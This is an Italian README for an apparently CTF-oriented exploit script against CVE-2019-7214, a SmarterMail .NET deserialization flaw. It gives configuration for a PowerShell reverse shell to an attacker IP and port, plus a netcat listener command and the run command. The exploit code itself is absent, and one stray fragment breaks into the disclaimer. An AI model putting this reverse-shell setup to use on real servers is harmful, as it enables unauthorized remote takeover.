
Solo per uso CTF (il CVE-2019-7214 risolve anche l'host da /etc/hosts)
Questo script Python colpisce un servizio vulnerabile in esecuzione su una macchina Windows remota. Invia un payload .NET serializzato che avvia una reverse shell basata su PowerShell verso la macchina dell'attaccante.
Esecuzione di codice remoto nella deserializzazione .NET per il sistema SmarterMail.
Aggiorna la sezione di configurazione dello script per adattarla al tuo ambiente:
HOSTNAME = 'hostname' # Nome host del target (risolto tramite /etc/hosts)
PORT = 9999 # Porta del target in ascolto per input serializzato
LHOST = '192.168.45.185' # IP dell'attaccante (listener)
LPORT = 4444 # Porta di ascolto dell'attaccante
nc -lvnp 4444
python3 CVE-2019-7214 .py
Se l'operazione riesce, otterrai un prompt PowerShell dal target sul tuo listener.
System.Management.Automation.Questo script è fornito solo a scopo educativo. L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o senza esplicita autorizzazione per i test è illegale e non etico.